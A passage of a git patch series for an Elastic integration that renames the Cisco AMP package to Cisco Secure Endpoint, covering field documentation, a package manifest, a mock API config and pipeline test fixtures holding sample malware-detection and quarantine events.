-| cisco.amp.file.archived_file.disposition | Categorization of a file archive related to a file, for example "Malicious" or "Clean". | keyword |
-| cisco.amp.file.archived_file.identity.md5 | MD5 hash of the archived file related to the malicious event. | keyword |
-| cisco.amp.file.archived_file.identity.sha1 | SHA1 hash of the archived file related to the malicious event. | keyword |
-| cisco.amp.file.archived_file.identity.sha256 | SHA256 hash of the archived file related to the malicious event. | keyword |
-| cisco.amp.file.attack_details.application | The application name related to Exploit Prevention events. | keyword |
-| cisco.amp.file.attack_details.attacked_module | Path to the executable or dll that was attacked and detected by Exploit Prevention. | keyword |
-| cisco.amp.file.attack_details.base_address | The base memory address related to the exploit detected. | keyword |
-| cisco.amp.file.attack_details.indicators | Different indicator types that matches the exploit detected, for example different MITRE tactics. | flattened |
-| cisco.amp.file.attack_details.suspicious_files | An array of related files when an attack is detected by Exploit Prevention. | keyword |
-| cisco.amp.file.disposition | Categorization of file, for example "Malicious" or "Clean". | keyword |
-| cisco.amp.file.parent.disposition | Categorization of parrent, for example "Malicious" or "Clean". | keyword |
-| cisco.amp.group_guids | An array of group GUIDS related to the connector sending information to AMP. | keyword |
-| cisco.amp.mitre_tactics | Array of all related mitre tactic ID's | keyword |
-| cisco.amp.mitre_techniques | Array of all related mitre technique ID's | keyword |
-| cisco.amp.network_info.disposition | Categorization of a network event related to a file, for example "Malicious" or "Clean". | keyword |
-| cisco.amp.network_info.nfm.direction | The current direction based on source and destination IP. | keyword |
-| cisco.amp.network_info.parent.disposition | Categorization of a IOC for example "Malicious" or "Clean". | keyword |
-| cisco.amp.network_info.parent.identify.sha256 | SHA256 hash of the related IOC. | keyword |
-| cisco.amp.network_info.parent.identity.md5 | MD5 hash of the related IOC. | keyword |
-| cisco.amp.network_info.parent.identity.sha1 | SHA1 hash of the related IOC. | keyword |
-| cisco.amp.related.cve | An array of all related CVEs | keyword |
-| cisco.amp.related.mac | An array of all related MAC addresses. | keyword |
-| cisco.amp.scan.clean | Boolean value if a scanned file was clean or not. | boolean |
-| cisco.amp.scan.description | Description of an event related to a scan being initiated, for example the specific directory name. | keyword |
-| cisco.amp.scan.malicious_detections | Count of malicious files or documents detected related to a single scan event. | long |
-| cisco.amp.scan.scanned_files | Count of files scanned in a directory. | long |
-| cisco.amp.scan.scanned_paths | Count of different directories scanned related to a single scan event. | long |
-| cisco.amp.scan.scanned_processes | Count of processes scanned related to a single scan event. | long |
-| cisco.amp.tactics | List of all MITRE tactics related to the incident found. | flattened |
-| cisco.amp.techniques | List of all MITRE techniques related to the incident found. | flattened |
-| cisco.amp.threat_hunting.incident_end_time | When the threat hunt finalized or closed. | date |
-| cisco.amp.threat_hunting.incident_hunt_guid | The GUID of the related investigation tracking issue. | keyword |
-| cisco.amp.threat_hunting.incident_id | The id of the related incident for the threat hunting activity. | long |
-| cisco.amp.threat_hunting.incident_remediation | Recommendations to resolve the vulnerability or exploited host. | keyword |
-| cisco.amp.threat_hunting.incident_report_guid | The GUID of the related threat hunting report. | keyword |
-| cisco.amp.threat_hunting.incident_start_time | When the threat hunt was initiated. | date |
-| cisco.amp.threat_hunting.incident_summary | Summary of the outcome on the threat hunting activity. | keyword |
-| cisco.amp.threat_hunting.incident_title | Title of the incident related to the threat hunting activity. | keyword |
-| cisco.amp.threat_hunting.severity | Severity result of the threat hunt registered to the malicious event. Can be Low-Critical. | keyword |
-| cisco.amp.threat_hunting.tactics | List of all MITRE tactics related to the incident found. | flattened |
-| cisco.amp.threat_hunting.techniques | List of all MITRE techniques related to the incident found. | flattened |
-| cisco.amp.timestamp_nanoseconds | The timestamp in Epoch nanoseconds. | date |
-| cisco.amp.vulnerabilities | An array of related vulnerabilities to the malicious event. | flattened |
+| cisco.secure_endpoint.bp_data | Endpoint isolation information | flattened |
+| cisco.secure_endpoint.cloud_ioc.description | Description of the related IOC for specific IOC events from AMP. | keyword |
+| cisco.secure_endpoint.cloud_ioc.short_description | Short description of the related IOC for specific IOC events from AMP. | keyword |
+| cisco.secure_endpoint.command_line.arguments | The CLI arguments related to the Cloud Threat IOC reported by Cisco. | keyword |
+| cisco.secure_endpoint.computer.active | If the current endpoint is active or not. | boolean |
+| cisco.secure_endpoint.computer.connector_guid | The GUID of the connector, similar to top level connector_guid, but unique if multiple connectors are involved. | keyword |
+| cisco.secure_endpoint.computer.external_ip | The external IP of the related host. | ip |
+| cisco.secure_endpoint.computer.network_addresses | All network interface information on the related host. | flattened |
+| cisco.secure_endpoint.connector_guid | The GUID of the connector sending information to AMP. | keyword |
+| cisco.secure_endpoint.detection | The name of the malware detected. | keyword |
+| cisco.secure_endpoint.detection_id | The ID of the detection. | keyword |
+| cisco.secure_endpoint.error.description | Description of an endpoint error event. | keyword |
+| cisco.secure_endpoint.error.error_code | The error code describing the related error event. | long |
+| cisco.secure_endpoint.event_type_id | A sub ID of the event, depending on event type. | long |
+| cisco.secure_endpoint.file.archived_file.disposition | Categorization of a file archive related to a file, for example "Malicious" or "Clean". | keyword |
+| cisco.secure_endpoint.file.archived_file.identity.md5 | MD5 hash of the archived file related to the malicious event. | keyword |
+| cisco.secure_endpoint.file.archived_file.identity.sha1 | SHA1 hash of the archived file related to the malicious event. | keyword |
+| cisco.secure_endpoint.file.archived_file.identity.sha256 | SHA256 hash of the archived file related to the malicious event. | keyword |
+| cisco.secure_endpoint.file.attack_details.application | The application name related to Exploit Prevention events. | keyword |
+| cisco.secure_endpoint.file.attack_details.attacked_module | Path to the executable or dll that was attacked and detected by Exploit Prevention. | keyword |
+| cisco.secure_endpoint.file.attack_details.base_address | The base memory address related to the exploit detected. | keyword |
+| cisco.secure_endpoint.file.attack_details.indicators | Different indicator types that matches the exploit detected, for example different MITRE tactics. | flattened |
+| cisco.secure_endpoint.file.attack_details.suspicious_files | An array of related files when an attack is detected by Exploit Prevention. | keyword |
+| cisco.secure_endpoint.file.disposition | Categorization of file, for example "Malicious" or "Clean". | keyword |
+| cisco.secure_endpoint.file.parent.disposition | Categorization of parrent, for example "Malicious" or "Clean". | keyword |
+| cisco.secure_endpoint.group_guids | An array of group GUIDS related to the connector sending information to AMP. | keyword |
+| cisco.secure_endpoint.mitre_tactics | Array of all related mitre tactic ID's | keyword |
+| cisco.secure_endpoint.mitre_techniques | Array of all related mitre technique ID's | keyword |
+| cisco.secure_endpoint.network_info.disposition | Categorization of a network event related to a file, for example "Malicious" or "Clean". | keyword |
+| cisco.secure_endpoint.network_info.nfm.direction | The current direction based on source and destination IP. | keyword |
+| cisco.secure_endpoint.network_info.parent.disposition | Categorization of a IOC for example "Malicious" or "Clean". | keyword |
+| cisco.secure_endpoint.network_info.parent.identify.sha256 | SHA256 hash of the related IOC. | keyword |
+| cisco.secure_endpoint.network_info.parent.identity.md5 | MD5 hash of the related IOC. | keyword |
+| cisco.secure_endpoint.network_info.parent.identity.sha1 | SHA1 hash of the related IOC. | keyword |
+| cisco.secure_endpoint.related.cve | An array of all related CVEs | keyword |
+| cisco.secure_endpoint.related.mac | An array of all related MAC addresses. | keyword |
+| cisco.secure_endpoint.scan.clean | Boolean value if a scanned file was clean or not. | boolean |
+| cisco.secure_endpoint.scan.description | Description of an event related to a scan being initiated, for example the specific directory name. | keyword |
+| cisco.secure_endpoint.scan.malicious_detections | Count of malicious files or documents detected related to a single scan event. | long |
+| cisco.secure_endpoint.scan.scanned_files | Count of files scanned in a directory. | long |
+| cisco.secure_endpoint.scan.scanned_paths | Count of different directories scanned related to a single scan event. | long |
+| cisco.secure_endpoint.scan.scanned_processes | Count of processes scanned related to a single scan event. | long |
+| cisco.secure_endpoint.tactics | List of all MITRE tactics related to the incident found. | flattened |
+| cisco.secure_endpoint.techniques | List of all MITRE techniques related to the incident found. | flattened |
+| cisco.secure_endpoint.threat_hunting.incident_end_time | When the threat hunt finalized or closed. | date |
+| cisco.secure_endpoint.threat_hunting.incident_hunt_guid | The GUID of the related investigation tracking issue. | keyword |
+| cisco.secure_endpoint.threat_hunting.incident_id | The id of the related incident for the threat hunting activity. | long |
+| cisco.secure_endpoint.threat_hunting.incident_remediation | Recommendations to resolve the vulnerability or exploited host. | keyword |
+| cisco.secure_endpoint.threat_hunting.incident_report_guid | The GUID of the related threat hunting report. | keyword |
+| cisco.secure_endpoint.threat_hunting.incident_start_time | When the threat hunt was initiated. | date |
+| cisco.secure_endpoint.threat_hunting.incident_summary | Summary of the outcome on the threat hunting activity. | keyword |
+| cisco.secure_endpoint.threat_hunting.incident_title | Title of the incident related to the threat hunting activity. | keyword |
+| cisco.secure_endpoint.threat_hunting.severity | Severity result of the threat hunt registered to the malicious event. Can be Low-Critical. | keyword |
+| cisco.secure_endpoint.threat_hunting.tactics | List of all MITRE tactics related to the incident found. | flattened |
+| cisco.secure_endpoint.threat_hunting.techniques | List of all MITRE techniques related to the incident found. | flattened |
+| cisco.secure_endpoint.timestamp_nanoseconds | The timestamp in Epoch nanoseconds. | date |
+| cisco.secure_endpoint.vulnerabilities | An array of related vulnerabilities to the malicious event. | flattened |
 | cloud.account.id | The cloud account or organization id used to identify different entities in a multi-tenant environment. Examples: AWS account id, Google Cloud ORG Id, or other unique identifier. | keyword |
 | cloud.availability_zone | Availability zone in which this host is running. | keyword |
 | cloud.image.id | Image ID for the cloud instance. | keyword |
diff --git a/packages/cisco_amp/img/cisco.svg b/packages/cisco_secure_endpoint/img/cisco.svg
similarity index 100%
rename from packages/cisco_amp/img/cisco.svg
rename to packages/cisco_secure_endpoint/img/cisco.svg
diff --git a/packages/cisco_secure_endpoint/manifest.yml b/packages/cisco_secure_endpoint/manifest.yml
new file mode 100644
index 00000000000..cdab58847ef
--- /dev/null
+++ b/packages/cisco_secure_endpoint/manifest.yml
@@ -0,0 +1,28 @@
+format_version: 1.0.0
+name: cisco_secure_endpoint
+title: Cisco Secure Endpoint (AMP)
+version: 0.1.0
+license: basic
+description: This Elastic integration collects logs from Cisco Secure Endpoint (formerly Cisco AMP)
+type: integration
+categories:
+  - network
+  - security
+release: beta
+conditions:
+  kibana.version: "^7.16.0"
+icons:
+  - src: /img/cisco.svg
+    title: cisco
+    size: 216x216
+    type: image/svg+xml
+policy_templates:
+  - name: cisco_secure_endpoint
+    title: Cisco Secure Endpoint logs
+    description: Collect logs from Cisco Secure Endpoint
+    inputs:
+      - type: httpjson
+        title: Collect logs from the Cisco Secure Endpoint API
+        description: Collecting logs from the Cisco Secure Endpoint API
+owner:
+  github: elastic/security-external-integrations

From 75cf72ddbeb18ab50fd4bbf469dd2437cf1eacad Mon Sep 17 00:00:00 2001
From: Alex Resnick <adr8292@gmail.com>
Date: Mon, 27 Sep 2021 03:38:57 +0000
Subject: [PATCH 5/9] update pipeline, system tests still not working

---
 .../_dev/deploy/docker/files/config.yml       |   5 +-
 .../test-cisco-amp1.log-expected.json         | 196 ++++-----
 .../test-cisco-amp2.log-expected.json         | 243 +++++------
 .../test-cisco-amp3.log-expected.json         | 180 ++++----
 .../test-cisco-amp4.log-expected.json         | 400 +++++++++---------
 .../test-cisco-amp5.log-expected.json         | 262 ++++++------
 .../test-cisco-amp6.log-expected.json         | 212 +++++-----
 .../test-cisco-amp7.log-expected.json         | 196 ++++-----
 .../elasticsearch/ingest_pipeline/default.yml |  92 +++-
 .../data_stream/log/fields/base-fields.yml    |  22 -
 .../data_stream/log/fields/ecs.yml            |  14 +
 .../data_stream/log/sample_event.json         | 134 ++++--
 packages/cisco_secure_endpoint/docs/README.md | 144 +++++--
 13 files changed, 1141 insertions(+), 959 deletions(-)

diff --git a/packages/cisco_secure_endpoint/_dev/deploy/docker/files/config.yml b/packages/cisco_secure_endpoint/_dev/deploy/docker/files/config.yml
index 12dfd297f2c..04c76e4c5a6 100644
--- a/packages/cisco_secure_endpoint/_dev/deploy/docker/files/config.yml
+++ b/packages/cisco_secure_endpoint/_dev/deploy/docker/files/config.yml
@@ -2,7 +2,8 @@ rules:
   - path: /v1/events
     methods: ["GET"]
     request_headers:
-      authorization: Basic YWJjZC1hYmNkOnh4eHh4eHh4eHg=
+      Authorization:
+        - "Basic YWJjZC1hYmNkOnh4eHh4eHh4eHg="
     query_params:
       offset: "{offset:.*}"
       limit: "{limit:.*}"
@@ -14,7 +15,7 @@ rules:
             "version": "v1.2.0",
             "metadata": {
               "links": {
-                "self": "http://{{ hostname }}:{{ env "PORT" }}/v1/events?limit={{ .request.vars.limit }}&offset=limit={{ .request.vars.offset }}",
+                "self": "http://{{ hostname }}:{{ env "PORT" }}/v1/events?limit={{ .request.vars.limit }}&offset={{ .request.vars.offset }}",
               },
               "results": {
                 "total": 4,
diff --git a/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp1.log-expected.json b/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp1.log-expected.json
index a2729963432..97cb25c9fd3 100644
--- a/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp1.log-expected.json
+++ b/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp1.log-expected.json
@@ -38,7 +38,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:06:29.783713069Z",
+                "ingested": "2021-09-27T00:40:55.631357878Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411425813945647000,\"timestamp\":1610620426,\"timestamp_nanoseconds\":742000000,\"date\":\"2021-01-14T10:33:46+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.12081E6CA3-95.SBX.TG\",\"detection_id\":\"6411425813945647105\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\",\"sha1\":\"128aa78059540cf0cdae2a3cea30cd80e00f2046\",\"md5\":\"c877b67a5733c59d0d8ed8d519df0c91\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -49,7 +49,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.12081E6CA3-95.SBX.TG",
                     "computer": {
                         "active": true,
@@ -104,13 +104,13 @@
             "event": {
                 "severity": 0,
                 "action": "Policy Update",
-                "ingested": "2021-09-13T18:06:29.783719163Z",
+                "ingested": "2021-09-27T00:40:55.631362255Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533243623469744000,\"timestamp\":1610619329,\"timestamp_nanoseconds\":596000000,\"date\":\"2021-01-14T10:15:29+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}",
                 "id": "6533243623469744000",
                 "kind": "alert"
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -191,7 +191,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:29.783721500Z",
+                "ingested": "2021-09-27T00:40:55.631364362Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241347137077000,\"timestamp\":1610618799,\"timestamp_nanoseconds\":657000000,\"date\":\"2021-01-14T10:06:39+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Overdrive.RET\",\"detection_id\":\"6533241347137077251\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"BIT657.tmp\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\BIT657.tmp\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\",\"sha1\":\"cf162622e29bca072d01b274fbbc3ceaacdd13c7\",\"md5\":\"0fe5be3811a98ee6a9c997d3812d911a\"},\"parent\":{\"process_id\":896,\"disposition\":\"Clean\",\"file_name\":\"svchost.exe\",\"identity\":{\"sha256\":\"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2\",\"sha1\":\"4af001b3c3816b860660cf2de2c0fd3c1dfb4878\",\"md5\":\"54a47f6b5e09a77e61649109c6a08866\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -202,7 +202,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.Overdrive.RET",
                     "computer": {
                         "active": true,
@@ -268,7 +268,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:29.783723655Z",
+                "ingested": "2021-09-27T00:40:55.631366339Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241347137077000,\"timestamp\":1610618799,\"timestamp_nanoseconds\":657000000,\"date\":\"2021-01-14T10:06:39+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6533241347137077251\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -278,7 +278,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -339,7 +339,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:29.783725794Z",
+                "ingested": "2021-09-27T00:40:55.631368328Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241145273614000,\"timestamp\":1610618752,\"timestamp_nanoseconds\":525000000,\"date\":\"2021-01-14T10:05:52+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6533241145273614337\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -349,7 +349,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -439,7 +439,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:29.783727990Z",
+                "ingested": "2021-09-27T00:40:55.631370243Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241145273614000,\"timestamp\":1610618752,\"timestamp_nanoseconds\":619000000,\"date\":\"2021-01-14T10:05:52+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Overdrive.RET\",\"detection_id\":\"6533241145273614338\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"SqGGuYXyy.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\SqGGuYXyy.exe\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\",\"sha1\":\"cf162622e29bca072d01b274fbbc3ceaacdd13c7\",\"md5\":\"0fe5be3811a98ee6a9c997d3812d911a\"},\"parent\":{\"process_id\":896,\"disposition\":\"Clean\",\"file_name\":\"svchost.exe\",\"identity\":{\"sha256\":\"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2\",\"sha1\":\"4af001b3c3816b860660cf2de2c0fd3c1dfb4878\",\"md5\":\"54a47f6b5e09a77e61649109c6a08866\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -450,7 +450,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.Overdrive.RET",
                     "computer": {
                         "active": true,
@@ -537,7 +537,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:29.783730076Z",
+                "ingested": "2021-09-27T00:40:55.631372159Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241145273614000,\"timestamp\":1610618752,\"timestamp_nanoseconds\":525000000,\"date\":\"2021-01-14T10:05:52+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Overdrive.RET\",\"detection_id\":\"6533241145273614337\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"BIT4BBF.tmp\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\BIT4BBF.tmp\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\"},\"parent\":{\"process_id\":896,\"disposition\":\"Clean\",\"file_name\":\"svchost.exe\",\"identity\":{\"sha256\":\"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2\",\"sha1\":\"4af001b3c3816b860660cf2de2c0fd3c1dfb4878\",\"md5\":\"54a47f6b5e09a77e61649109c6a08866\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -548,7 +548,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.Overdrive.RET",
                     "computer": {
                         "active": true,
@@ -614,7 +614,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:29.783732206Z",
+                "ingested": "2021-09-27T00:40:55.631374059Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241145273614000,\"timestamp\":1610618752,\"timestamp_nanoseconds\":619000000,\"date\":\"2021-01-14T10:05:52+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6533241145273614338\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -624,7 +624,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -692,7 +692,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:29.783734294Z",
+                "ingested": "2021-09-27T00:40:55.631376023Z",
